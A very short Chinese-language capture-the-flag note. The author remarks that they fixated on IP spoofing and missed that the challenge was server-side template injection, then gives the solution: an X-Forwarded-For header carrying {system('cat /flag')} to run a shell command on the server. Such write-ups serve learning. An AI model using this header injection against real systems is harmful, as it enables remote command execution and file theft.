光顾着想IP了,没注意到是SSTI
    添加一个用户头提交:

    1. x-forwarded-for: {system('cat /flag')}